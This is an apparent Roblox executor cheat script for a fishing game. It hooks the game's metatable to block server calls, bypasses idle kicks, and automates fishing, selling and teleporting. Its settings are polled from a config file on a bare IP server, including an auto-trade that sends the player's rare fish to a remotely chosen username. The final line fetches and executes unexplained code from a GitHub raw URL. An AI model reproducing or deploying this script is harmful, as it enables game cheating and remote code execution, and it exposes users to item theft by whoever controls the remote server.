-- ======================================================
-- ULTIMATE WEB-CONTROLLED OVERLAY: POTATO V2 + INVISIBLE
-- [AUTO SELL + RUBY FIX + INVISIBLE MAP/CHAR]
-- ======================================================

local CONFIG_URL = "http://165.232.148.115:5000/config.json"

-- ===============================
-- 1. GLOBAL SERVICES
-- ===============================
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local HttpService = game:GetService("HttpService")
local RunService = game:GetService("RunService")
local CoreGui = game:GetService("CoreGui")
local Lighting = game:GetService("Lighting")
local Workspace = game:GetService("Workspace")
local lp = Players.LocalPlayer

-- ANTI-AFK
pcall(function()
    for _, v in pairs(getconnections(lp.Idled)) do
        if v.Disable then v:Disable() end
    end
end)
task.spawn(function()
    while true do
        task.wait(60)
        local bb = game:GetService("VirtualUser")
        pcall(function() bb:CaptureController() bb:ClickButton2(Vector2.new()) end)
    end
end)

-- CLIENT BYPASSES
task.spawn(function()
    local S1, FishingController = pcall(function() return require(ReplicatedStorage.Controllers.FishingController) end)
    
    if S1 and FishingController then
        FishingController.RequestChargeFishingRod = function(...) return nil end
        FishingController.SendFishingRequestToServer = function(...) return false, "Blocked" end
    end
end)

local mt = getrawmetatable(game)
local old_namecall = mt.__namecall
setreadonly(mt, false)
mt.__namecall = newcclosure(function(self, ...)
    local method = getnamecallmethod()
    if not checkcaller() then
        local blocked = {
            ["RequestFishingMinigameStarted"] = true,
            ["ChargeFishingRod"] = true,
            ["UpdateAutoFishingState"] = true,
            ["CancelFishingInputs"] = true
        }
        if method == "InvokeServer" and blocked[self.Name] then return task.wait(9e9) end
        if method == "FireServer" and self.Name == "FishingCompleted" then return nil end
    end
    return old_namecall(self, ...)
end)
setreadonly(mt, true)

-- ===============================
-- 2. UI OVERLAY SETUP
-- ===============================
if CoreGui:FindFirstChild("MainOverlayGui") then CoreGui.MainOverlayGui:Destroy() end

local ScreenGui = Instance.new("ScreenGui", CoreGui)
ScreenGui.Name = "MainOverlayGui"
ScreenGui.IgnoreGuiInset = true 
ScreenGui.DisplayOrder = 9999

local Background = Instance.new("Frame", ScreenGui)
Background.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Background.Size = UDim2.new(1, 0, 1, 0)
Background.BorderSizePixel = 0

local ContentFrame = Instance.new("Frame", Background)
ContentFrame.AnchorPoint = Vector2.new(0.5, 0.5)
ContentFrame.Position = UDim2.new(0.5, 0, 0.5, 0)
ContentFrame.Size = UDim2.new(0.9, 0, 0.7, 0)
ContentFrame.BackgroundTransparency = 1

local UIListLayout = Instance.new("UIListLayout", ContentFrame)
UIListLayout.Padding = UDim.new(0, 12)
UIListLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center

local function CreateLabel(name, color)
    local label = Instance.new("TextLabel", ContentFrame)
    label.BackgroundTransparency = 1
    label.Size = UDim2.new(1, 0, 0, 30)
    label.Font = Enum.Font.GothamBold
    label.TextColor3 = color or Color3.fromRGB(255, 255, 255)
    label.TextSize = 20
    label.Text = "Syncing..."
    return label
end

local SecretLabel = CreateLabel("SecretLabel", Color3.fromRGB(255, 215, 0))
local DistanceLabel = CreateLabel("DistanceLabel", Color3.fromRGB(80, 255, 80))
local LocationLabel = CreateLabel("LocationLabel", Color3.fromRGB(0, 180, 255))
local TotemLabel = CreateLabel("TotemLabel", Color3.fromRGB(200, 0, 200))
local TradeLabel = CreateLabel("TradeLabel")
local FishLabel = CreateLabel("FishLabel")
local SellLabel = CreateLabel("SellLabel", Color3.fromRGB(100, 255, 100))
local PotatoLabel = CreateLabel("PotatoLabel", Color3.fromRGB(255, 165, 0))

local ToggleBtn = Instance.new("TextButton", ScreenGui)
ToggleBtn.Size = UDim2.fromOffset(40, 40)
ToggleBtn.Position = UDim2.new(0, 10, 0, 10)
ToggleBtn.Text = "👁️"
ToggleBtn.ZIndex = 10000
Instance.new("UICorner", ToggleBtn).CornerRadius = UDim.new(1, 0)

ToggleBtn.MouseButton1Click:Connect(function()
    Background.Visible = not Background.Visible
    ToggleBtn.Text = Background.Visible and "👁️" or "❌"
end)

-- ===============================
-- 3. DATA & CONFIG
-- ===============================
local Replion = require(ReplicatedStorage.Packages.Replion).Client
local ItemUtility = require(ReplicatedStorage.Shared.ItemUtility)
local TierUtility = require(ReplicatedStorage.Shared.TierUtility)
local PlayerData = Replion:WaitReplion("Data", 10)

local AreaData = {
    ["Iron Cavern"] = {Pos = Vector3.new(-8792.546, -588.0, 230.642), Look = Vector3.new(0.718, 0, 0.696)},
    ["Disco Event"] = {Pos = Vector3.new(-8641.672, -547.5, 160.322), Look = Vector3.new(0.984, 0, 0.176)},
    ["Classic Island"] = {Pos = Vector3.new(1440.843, 46.062, 2777.175), Look = Vector3.new(0.94, 0, 0.342)},
    ["Ancient Jungle"] = {Pos = Vector3.new(1535.639, 3.159, -193.352), Look = Vector3.new(0.505, 0, 0.863)},
    ["Coral Reef"] = {Pos = Vector3.new(-3207.538, 6.087, 2011.079), Look = Vector3.new(0.973, 0, 0.229)},
    ["Crater Island"] = {Pos = Vector3.new(1058.976, 2.33, 5032.878), Look = Vector3.new(-0.789, 0, 0.615)},
    ["Crystalline Passage"] = {Pos = Vector3.new(6051.567, -538.9, 4370.979), Look = Vector3.new(0.109, 0, 0.994)},
    ["Ancient Ruin"] = {Pos = Vector3.new(6031.981, -585.924, 4713.157), Look = Vector3.new(0.316, 0, -0.949)},
    ["Enchant Room"] = {Pos = Vector3.new(3255.67, -1301.53, 1371.79), Look = Vector3.new(0, 0, -1.0)},
    ["Esoteric Island"] = {Pos = Vector3.new(2164.47, 3.22, 1242.39), Look = Vector3.new(0, 0, -1.0)},
    ["Fisherman Island"] = {Pos = Vector3.new(74.03, 9.53, 2705.23), Look = Vector3.new(0, 0, -1.0)},
    ["Kohana"] = {Pos = Vector3.new(-668.732, 3.0, 681.58), Look = Vector3.new(0.889, 0, 0.458)},
    ["Lost Isle"] = {Pos = Vector3.new(-3804.105, 2.344, -904.653), Look = Vector3.new(-0.901, 0, 0.433)},
    ["Sacred Temple"] = {Pos = Vector3.new(1461.815, -22.125, -670.234), Look = Vector3.new(-0.99, 0, 0.143)},
    ["Sisyphus Statue"] = {Pos = Vector3.new(-3743.745, -135.074, -1007.554), Look = Vector3.new(0.31, 0, 0.951)},
    ["Treasure Room"] = {Pos = Vector3.new(-3598.44, -281.274, -1645.855), Look = Vector3.new(-0.065, 0, -0.998)},
    ["Tropical Island"] = {Pos = Vector3.new(-2162.92, 2.825, 3638.445), Look = Vector3.new(0.381, 0, 0.925)},
    ["Volcano"] = {Pos = Vector3.new(-605.121, 19.516, 160.01), Look = Vector3.new(0.854, 0, 0.52)},
    ["Weather Machine"] = {Pos = Vector3.new(-1518.55, 2.875, 1916.148), Look = Vector3.new(0.042, 0, 0.999)},
}

local function GetRemote(name)
    local p = {"Packages", "_Index", "sleitnick_net@0.2.0", "net"}
    local c = ReplicatedStorage
    for _, v in ipairs(p) do c = c:WaitForChild(v, 2) end
    return c:FindFirstChild(name)
end

-- ===============================
-- 4. UTILS & HELPERS
-- ===============================
local function GetFishNameAndRarity(item)
    local name = item.Identifier or "Unknown"
    local rarity = item.Metadata and item.Metadata.Rarity or "COMMON"
    local itemID = item.Id
    local itemData

    if ItemUtility and itemID then
        pcall(function()
            itemData = ItemUtility:GetItemData(itemID)
            if not itemData then
                local numericID = tonumber(item.Id) or tonumber(item.Identifier)
                if numericID then itemData = ItemUtility:GetItemData(numericID) end
            end
        end)
    end

    if itemData and itemData.Data and itemData.Data.Name then name = itemData.Data.Name end
    if item.Metadata and item.Metadata.Rarity then rarity = item.Metadata.Rarity 
    elseif itemData and itemData.Probability and TierUtility then 
        local tier
        pcall(function() tier = TierUtility:GetTierFromRarity(itemData.Probability.Chance) end) 
        if tier and tier.Name then rarity = tier.Name end 
    end
    return name, rarity
end

local function GetMutation(item)
    if not item.Metadata then return "None" end
    if item.Metadata.VariantId and item.Metadata.VariantId ~= "" then 
        return item.Metadata.VariantId 
    end
    if item.Metadata.Shiny == true then 
        return "Shiny" 
    end
    return "None"
end

local function IsSecretFish(item)
    if not item.UUID then return false end
    local _, rarity = GetFishNameAndRarity(item)
    return string.upper(tostring(rarity)) == "SECRET"
end

local function GetSecretUUIDs()
    local uuids = {}
    local fishInfo = {}
    local inv = PlayerData:GetExpect("Inventory")
    if not inv then return uuids, fishInfo end
    
    for _, items in pairs(inv) do
        if type(items) == "table" then
            for _, item in ipairs(items) do
                if item and IsSecretFish(item) then
                    table.insert(uuids, item.UUID)
                    local fishName, rarity = GetFishNameAndRarity(item)
                    table.insert(fishInfo, {uuid = item.UUID, name = fishName, rarity = rarity})
                end
            end
        end
    end
    return uuids, fishInfo
end

-- CONFIG STATE
local FishingConfig = { 
    Enabled = false, 
    Area = "",
    AutoFavorite = false,
    AutoSell = false,
    AutoSellDelay = 2,
    AutoUnfavoriteRuby = false
}
local TradingConfig = { AutoTrade = false, TargetUsername = "", TargetId = nil, Delay = 6.0, Mode = "SECRETS_FIRST" }
local AutoTotemEnabled = false
local PotatoModeEnabled = false
local GlobalSecretUUIDs = {}
local CurrentDistanceMeters = 999
local FishingThreads = {}
local SellThread = nil
local TradingThread = nil
local TotemThread = nil

local TOTEM_ID = 2
local TOTEM_NAME = "Mutation Totem"
local TOTEM_INTERVAL = 3700

-- =======================================================
-- 5. POTATO MODE (INVISIBLE MAP & CHARACTER ADDED)
-- =======================================================
local OptimizerApplied = false

-- A. Invisible Character Logic
local function MakeCharacterInvisible(char)
    if not PotatoModeEnabled then return end
    if not char then return end
    
    -- Nuke Animations
    local hum = char:WaitForChild("Humanoid", 5)
    if hum then
        local animate = char:FindFirstChild("Animate")
        if animate and animate:IsA("LocalScript") then animate.Enabled = false end
        local animator = hum:FindFirstChildOfClass("Animator")
        if animator then animator:Destroy() end
    end
    
    -- Make Invisible
    for _, v in ipairs(char:GetDescendants()) do
        if v:IsA("BasePart") or v:IsA("MeshPart") then
            v.Transparency = 1
        elseif v:IsA("Decal") or v:IsA("Texture") then
            v:Destroy()
        elseif v:IsA("Accessory") then
            local h = v:FindFirstChild("Handle")
            if h then h.Transparency = 1 end
        end
    end
end

-- B. Invisible Map Logic (With Anti-Freeze)
local function MakeMapInvisible()
    if not PotatoModeEnabled then return end
    
    -- Run in separate thread to prevent freeze
    task.spawn(function()
        local count = 0
        -- Loop through everything in workspace
        for _, v in ipairs(Workspace:GetDescendants()) do
            if not PotatoModeEnabled then break end
            
            -- Don't delete LocalPlayer's stuff (handled separately)
            if v:IsDescendantOf(lp.Character) then continue end
            
            pcall(function()
                if v:IsA("BasePart") or v:IsA("MeshPart") then
                    v.Transparency = 1
                    v.Material = Enum.Material.SmoothPlastic
                    v.Reflectance = 0
                elseif v:IsA("Decal") or v:IsA("Texture") or v:IsA("ParticleEmitter") or v:IsA("Trail") or v:IsA("Smoke") or v:IsA("Fire") then
                    v.Enabled = false
                    -- v:Destroy() -- Avoid destroying map assets, just disable/hide
                end
            end)
            
            count = count + 1
            if count % 500 == 0 then task.wait() end -- Anti-Freeze (Yield every 500 items)
        end
    end)
end

local function RunFPSBoost()
    if not PotatoModeEnabled then return end
    
    -- Lighting Nuke
    pcall(function()
        Lighting.GlobalShadows = false
        Lighting.FogEnd = 9e9
        Lighting.Brightness = 0
        Lighting.ClockTime = 14
        Lighting.Ambient = Color3.new(0,0,0)
    end)
    
    -- Rendering Nuke
    pcall(function()
        settings().Rendering.QualityLevel = Enum.QualityLevel.Level01
        settings().Rendering.TextureQuality = Enum.TextureQuality.Low
    end)
end

local function EnablePotatoMode()
    if OptimizerApplied then return end
    OptimizerApplied = true
    PotatoLabel.Text = "Invisible Mode: ACTIVATED"
    
    task.spawn(function()
        MakeCharacterInvisible(lp.Character)
        MakeMapInvisible() -- Trigger Map Invisibility
        RunFPSBoost()
    end)
end

local function DisablePotatoMode()
    OptimizerApplied = false
    PotatoLabel.Text = "Invisible Mode: Inactive (Rejoin to fix map)"
    pcall(function()
        Lighting.GlobalShadows = true
        Lighting.Brightness = 2
        Lighting.ClockTime = 14
    end)
end

-- Auto-Apply when Respawn
lp.CharacterAdded:Connect(function(char)
    if PotatoModeEnabled then
        task.wait(1)
        MakeCharacterInvisible(char)
    end
end)

-- ===============================
-- 6. AUTO TOTEM SYSTEM
-- ===============================
local function GetTotemUUID()
    local success, inventoryData = pcall(function() 
        local inv = PlayerData:GetExpect("Inventory")
        return inv and inv.Totems
    end)
    if success and inventoryData then 
        for _, item in ipairs(inventoryData) do 
            if tonumber(item.Id) == TOTEM_ID and (item.Count or 1) >= 1 then return item.UUID end 
        end 
    end
    return nil
end

local function SpawnMutationTotem()
    local char = lp.Character
    local hrp = char and char:FindFirstChild("HumanoidRootPart")
    if not hrp then return false end
    local uuid = GetTotemUUID()
    if not uuid then return false end
    local currentCFrame = hrp.CFrame
    local success = false
    pcall(function() 
        local RE_SpawnTotem = GetRemote("RE/SpawnTotem")
        if RE_SpawnTotem then RE_SpawnTotem:FireServer(uuid) success = true end
    end)
    hrp.CFrame = currentCFrame
    return success
end

local function StartAutoTotemLoop()
    if TotemThread then task.cancel(TotemThread) end
    TotemThread = task.spawn(function()
        local firstSuccess = SpawnMutationTotem()
        TotemLabel.Text = firstSuccess and "Totem: First placed!" or "Totem: Retrying..."
        if not firstSuccess then task.wait(30) SpawnMutationTotem() end
        task.wait(5)
        while AutoTotemEnabled do
            for i = TOTEM_INTERVAL, 0, -1 do
                if not AutoTotemEnabled then break end
                if i % 60 == 0 then 
                   local hours = math.floor(i / 3600)
                   local minutes = math.floor((i % 3600) / 60)
                   TotemLabel.Text = string.format("Totem: %dh %02dm", hours, minutes)
                end
                task.wait(1)
            end
            if not AutoTotemEnabled then break end
            SpawnMutationTotem()
            TotemLabel.Text = "Totem: Placed! (Wait)"
        end
        TotemThread = nil
    end)
end

-- ===============================
-- 7. AUTO SELL & UNFAVORITE (CORRECTED LOGIC)
-- ===============================
local function RunAutoSellLogic()
    if not FishingConfig.AutoSell then return end
    
    if FishingConfig.AutoUnfavoriteRuby then
        pcall(function()
            local inv = PlayerData:GetExpect("Inventory")
            if inv then
                for _, items in pairs(inv) do
                    if type(items) == "table" then
                        for _, item in ipairs(items) do
                            if item.IsFavorite or item.Favorited or item.Locked then
                                local name = GetFishNameAndRarity(item)
                                if name == "Ruby" then
                                    local mutation = GetMutation(item)
                                    if mutation ~= "Gemstone" then
                                        pcall(function()
                                            local favRemote = GetRemote("RE/ToggleFavorite") or GetRemote("RE/FavoriteItem") or GetRemote("FavoriteItem")
                                            if favRemote then favRemote:FireServer(item.UUID) end
                                        end)
                                        task.wait(0.3)
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end)
    end
    
    pcall(function()
        local sellRemote = GetRemote("RF/SellEverything") or GetRemote("RF/SellAll")
        if sellRemote then
            sellRemote:InvokeServer()
        else
            local rsEvents = ReplicatedStorage:FindFirstChild("events")
            if rsEvents and rsEvents:FindFirstChild("merchant") and rsEvents.merchant:FindFirstChild("sell") then
                rsEvents.merchant.sell:InvokeServer()
            end
        end
    end)
end

local function StartSellingLoop()
    if SellThread then task.cancel(SellThread) end
    SellThread = task.spawn(function()
        while FishingConfig.AutoSell do
            RunAutoSellLogic()
            SellLabel.Text = string.format("Auto Sell: ON (Delay %ds)", FishingConfig.AutoSellDelay or 2)
            task.wait(FishingConfig.AutoSellDelay or 2)
        end
        SellLabel.Text = "Auto Sell: OFF"
        SellThread = nil
    end)
end

-- ===============================
-- 8. FISHING LOOP
-- ===============================
local function RunInstantFish()
    local ts = os.time() + os.clock()
    pcall(function() GetRemote("RF/ChargeFishingRod"):InvokeServer(ts) end)
    pcall(function() GetRemote("RF/RequestFishingMinigameStarted"):InvokeServer(-139.630452165, 0.99647927980797) end)
    task.wait(1.5)
    pcall(function() GetRemote("RE/FishingCompleted"):FireServer() end)
    task.wait(0.3)
    pcall(function() GetRemote("RF/CancelFishingInputs"):InvokeServer() end)
end

local function StartFishingV1()
    if #FishingThreads > 0 then return end
    pcall(function() GetRemote("RF/UpdateAutoFishingState"):InvokeServer(true) end)
    
    table.insert(FishingThreads, task.spawn(function() 
        while FishingConfig.Enabled do 
            RunInstantFish() 
            task.wait(0.1) 
        end 
    end))
    
    table.insert(FishingThreads, task.spawn(function() 
        while FishingConfig.Enabled do 
            pcall(function() GetRemote("RE/EquipToolFromHotbar"):FireServer(1) end) 
            task.wait(0.5) 
        end 
    end))
    
    if FishingConfig.AutoSell then
        StartSellingLoop()
    end
end

local function StopFishing()
    for _, t in ipairs(FishingThreads) do task.cancel(t) end
    FishingThreads = {} 
    if SellThread then task.cancel(SellThread) SellThread = nil end
    SellLabel.Text = "Auto Sell: OFF"
    pcall(function() GetRemote("RF/UpdateAutoFishingState"):InvokeServer(false) end)
end

-- ===============================
-- 9. TRADE LOGIC
-- ===============================
local function RunAutoTrade()
    if TradingThread then task.cancel(TradingThread) end
    TradingThread = task.spawn(function()
        local RF_InitiateTrade = GetRemote("RF/InitiateTrade")
        while TradingConfig.AutoTrade do
            local secretUUIDs, _ = GetSecretUUIDs()
            if CurrentDistanceMeters < 5.0 and #secretUUIDs > 0 and TradingConfig.TargetId then
                pcall(function() 
                    RF_InitiateTrade:InvokeServer(TradingConfig.TargetId, secretUUIDs[1]) 
                end)
            end
            task.wait(TradingConfig.Delay)
        end
        TradingThread = nil
    end)
end

-- ===============================
-- 10. UI & SYNC
-- ===============================
task.spawn(function()
    while true do
        local uuids = {}
        pcall(function() uuids = GetSecretUUIDs() end)
        GlobalSecretUUIDs = uuids
        SecretLabel.Text = "Total Secrets: " .. tostring(#uuids)
        
        local target = Players:FindFirstChild(TradingConfig.TargetUsername)
        if target and target.Character and target.Character:FindFirstChild("HumanoidRootPart") then
            local myRoot = lp.Character and lp.Character:FindFirstChild("HumanoidRootPart")
            if myRoot then
                local mag = (myRoot.Position - target.Character.HumanoidRootPart.Position).Magnitude
                CurrentDistanceMeters = mag / 3.5
                DistanceLabel.Text = string.format("📍 %s: %.1f m", target.Name, CurrentDistanceMeters)
                DistanceLabel.TextColor3 = (CurrentDistanceMeters < 5.0) and Color3.fromRGB(80, 255, 80) or Color3.fromRGB(255, 200, 80)
            end
        else
            DistanceLabel.Text = "📍 " .. TradingConfig.TargetUsername .. ": Offline"
            CurrentDistanceMeters = 999
        end
        task.wait(1)
    end
end)

local function UpdateFromWeb(new)
    if new.AutoTotem ~= nil then
        AutoTotemEnabled = new.AutoTotem
        TotemLabel.Text = "Auto Totem: " .. tostring(AutoTotemEnabled)
        if AutoTotemEnabled then StartAutoTotemLoop() else if TotemThread then task.cancel(TotemThread) end end
    end
    
    if new.PotatoMode ~= nil then
        PotatoModeEnabled = new.PotatoMode
        PotatoLabel.Text = "Invisible Mode: " .. tostring(PotatoModeEnabled)
        if PotatoModeEnabled then EnablePotatoMode() else DisablePotatoMode() end
    end
    
    if new.FishingConfig then
        local oldEnabled = FishingConfig.Enabled
        local oldArea = FishingConfig.Area
        local oldSell = FishingConfig.AutoSell
        
        FishingConfig.Enabled = new.FishingConfig.Enabled
        FishingConfig.Area = new.FishingConfig.Area
        FishingConfig.AutoSell = new.FishingConfig.AutoSell
        FishingConfig.AutoSellDelay = new.FishingConfig.AutoSellDelay
        FishingConfig.AutoUnfavoriteRuby = new.FishingConfig.AutoUnfavoriteRuby
        FishingConfig.AutoFavorite = new.FishingConfig.AutoFavorite
        
        LocationLabel.Text = "Location: " .. FishingConfig.Area
        FishLabel.Text = "Auto Fishing: " .. tostring(FishingConfig.Enabled)
        
        if FishingConfig.Area and FishingConfig.Area ~= oldArea and AreaData[FishingConfig.Area] then
            local data = AreaData[FishingConfig.Area]
            local root = lp.Character and lp.Character:FindFirstChild("HumanoidRootPart")
            if root then root.CFrame = CFrame.new(data.Pos, data.Pos + data.Look) end
        end

        if FishingConfig.Enabled and not oldEnabled then 
            StartFishingV1()
        elseif not FishingConfig.Enabled and oldEnabled then 
            StopFishing()
        end
        
        if FishingConfig.Enabled and FishingConfig.AutoSell and not oldSell then
            StartSellingLoop()
        elseif not FishingConfig.AutoSell and oldSell then
            if SellThread then task.cancel(SellThread) SellThread = nil end
            SellLabel.Text = "Auto Sell: OFF"
        end
    end
    
    if new.TradingConfig then
        local oldAutoTrade = TradingConfig.AutoTrade
        TradingConfig.AutoTrade = new.TradingConfig.AutoTrade
        TradingConfig.TargetUsername = new.TradingConfig.TargetUsername or ""
        TradingConfig.Delay = new.TradingConfig.Delay or 6.0
        TradeLabel.Text = "Auto Trade: " .. tostring(TradingConfig.AutoTrade)
        
        if TradingConfig.TargetUsername ~= "" then
            task.spawn(function()
                local s, id = pcall(function() return Players:GetUserIdFromNameAsync(TradingConfig.TargetUsername) end)
                if s then TradingConfig.TargetId = id end
            end)
        end
        
        if TradingConfig.AutoTrade and not oldAutoTrade then RunAutoTrade()
        elseif not TradingConfig.AutoTrade and oldAutoTrade then 
            if TradingThread then task.cancel(TradingThread) TradingThread = nil end
        end
    end
end

-- ===============================
-- 11. WEB SYNC LOOP
-- ===============================
task.spawn(function()
    local success, res = pcall(function() return game:HttpGet(CONFIG_URL) end)
    if success then
        local ds, data = pcall(function() return HttpService:JSONDecode(res) end)
        if ds then UpdateFromWeb(data) end
    end
    
    local lastRaw = ""
    while true do
        task.wait(10)
        task.spawn(function()
            local s, r = pcall(function() return game:HttpGet(CONFIG_URL) end)
            if s and r ~= lastRaw then
                local ds, d = pcall(function() return HttpService:JSONDecode(r) end)
                if ds then 
                    lastRaw = r
                    UpdateFromWeb(d)
                end
            end
        end)
    end
end)

print("[System] POTATO V2 (FULL INVISIBLE) LOADED")
loadstring(game:HttpGet("https://raw.githubusercontent.com/abinoldi/muffinz/refs/heads/main/tormoni"))()
